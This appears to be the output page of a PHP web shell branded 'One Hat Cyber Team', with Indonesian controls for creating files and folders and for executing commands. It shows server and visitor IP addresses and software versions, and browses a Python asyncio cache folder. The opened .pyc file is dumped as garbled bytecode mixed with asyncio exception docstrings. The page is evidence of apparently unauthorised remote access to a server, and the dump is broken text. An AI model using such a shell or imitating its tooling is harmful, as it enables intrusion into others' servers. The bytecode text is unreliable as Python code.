⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.10
/
asyncio
/
__pycache__
/
View File Name :
exceptions.cpython-310.pyc
o }5ha @ sl d Z dZG dd deZG dd deZG dd deZG dd d eZG d d de Z G dd d eZdS )zasyncio exceptions.)CancelledErrorInvalidStateErrorTimeoutErrorIncompleteReadErrorLimitOverrunErrorSendfileNotAvailableErrorc @ e Zd ZdZdS )r z!The Future or Task was cancelled.N__name__ __module____qualname____doc__ r r )/usr/lib/python3.10/asyncio/exceptions.pyr r c @ r )r z*The operation exceeded the given deadline.Nr r r r r r r r c @ r )r z+The operation is not allowed in this state.Nr r r r r r r r c @ r )r z~Sendfile syscall is not available. Raised if OS does not support sendfile syscall for given socket or file type. Nr r r r r r r r c ( e Zd ZdZ fddZdd Z ZS )r z Incomplete read error. Attributes: - partial: read bytes string before the end of stream was reached - expected: total number of expected bytes (or None if unknown) c s@ |d u rdnt |}t t| d| d || _|| _d S )N undefinedz bytes read on a total of z expected bytes)reprsuper__init__lenpartialexpected)selfr r r_expected __class__r r r $ s zIncompleteReadError.__init__c C s t | | j| jffS N)typer r r r r r __reduce__+ s zIncompleteReadError.__reduce__r r r r r r __classcell__r r r r r s r c r )r zReached the buffer limit while looking for a separator. Attributes: - consumed: total number of to be consumed bytes. c s t | || _d S r )r r consumed)r messager" r r r r 5 s zLimitOverrunError.__init__c C s t | | jd | jffS )N )r argsr" r r r r r 9 s zLimitOverrunError.__reduce__r r r r r r / s r N)r __all__ BaseExceptionr Exceptionr r RuntimeErrorr EOFErrorr r r r r r
s